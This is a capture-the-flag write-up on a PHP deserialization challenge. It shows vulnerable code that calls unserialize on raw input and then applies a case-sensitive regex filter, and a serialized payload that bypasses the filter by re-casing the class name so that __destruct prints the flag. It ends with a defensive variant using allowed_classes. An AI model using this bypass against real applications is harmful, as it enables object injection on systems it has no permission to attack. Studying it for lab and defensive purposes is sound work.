- Code audit, as before
```php
<?php
highlight_file(__FILE__);
include('flag.php');
$cs = file_get_contents('php://input');

class ctfshow {
    public $username = 'xxxxxx';
    public $password = 'xxxxxx';

    public function __construct($u, $p) {
        $this->username = $u;
        $this->password = $p;
    }

    public function login() {
        return $this->username === $this->password;
    }

    public function __toString() {
        return $this->username;
    }

    public function __destruct() {
        global $flag;
        echo $flag;
    }
}

$ctfshowo = @unserialize($cs);
if (preg_match('/ctfshow/', $cs)) {
    // If the received serialized string contains "ctfshow", an exception is thrown
    // and the __destruct magic method is not executed
    throw new Exception("Error $ctfshowo", 1);
}
```
2. The check can be bypassed by changing the case of the class name
```php
<?php
class CTFshow {
    public $username = 'xxxxxx';
    public $password = 'xxxxxx';
}
echo serialize(new CTFshow());
// O:7:"CTFshow":2:{s:8:"username";s:6:"xxxxxx";s:8:"password";s:6:"xxxxxx";}
```
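The reason the case change works is that PHP resolves class names case-insensitively, so `unserialize()` maps `CTFshow` back onto the declared `ctfshow` class while a case-sensitive regex on the raw bytes never fires. The script below is an added example, not part of the original writeup: it reproduces that behaviour with a minimal stand-in `ctfshow` class (constructed here, not the challenge's class) and contrasts the challenge's check with a defensive variant that refuses to instantiate any class from untrusted input before the payload is ever deserialized. The function names `weakFilterBlocks`, `resolvedClass` and `safeUnserialize` are my own.

```php
<?php
// Added example: why a case-sensitive regex on the raw payload does not stop the
// deserialization above, and what a defensive check looks like instead.
// Minimal stand-in for the challenge class (constructed for this example).
class ctfshow {
    public $username = 'xxxxxx';
    public $password = 'xxxxxx';
}

// The challenge's check: a case-sensitive match on the raw payload,
// applied only after unserialize() has already run.
function weakFilterBlocks(string $cs): bool {
    return preg_match('/ctfshow/', $cs) === 1;
}

// PHP resolves class names case-insensitively, so every spelling of the
// name in the O:... record instantiates the same declared class.
function resolvedClass(string $cs): string {
    $o = @unserialize($cs);
    return is_object($o) ? get_class($o) : 'not an object';
}

// Defensive variant: never allow object instantiation from untrusted input.
// With allowed_classes => false every O:... record becomes __PHP_Incomplete_Class,
// so no __construct/__wakeup/__destruct/__toString of an application class can run,
// regardless of how the class name is spelled.
function safeUnserialize(string $cs) {
    return unserialize($cs, ['allowed_classes' => false]);
}

$payload = serialize(new ctfshow());                        // O:7:"ctfshow":2:{...}
$variant = str_replace('"ctfshow"', '"CTFshow"', $payload); // same record, name re-cased

var_dump(weakFilterBlocks($payload));   // bool(true)
var_dump(weakFilterBlocks($variant));   // bool(false): the regex never sees "ctfshow"
var_dump(resolvedClass($variant));      // string(7) "ctfshow": same class instantiated anyway

$safe = safeUnserialize($variant);
var_dump(get_class($safe));             // string(22) "__PHP_Incomplete_Class"
```

Two design points follow from this. First, a deny-list regex on serialized bytes is the wrong layer: the class name is one of many fields an attacker controls, and the deserializer normalizes it after the check has run. Second, the order matters: the challenge code calls `unserialize()` first and filters second, so the object already exists by the time the exception is thrown; a defensive version validates, or better, restricts `allowed_classes`, before any object is created.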
- Submit with a tool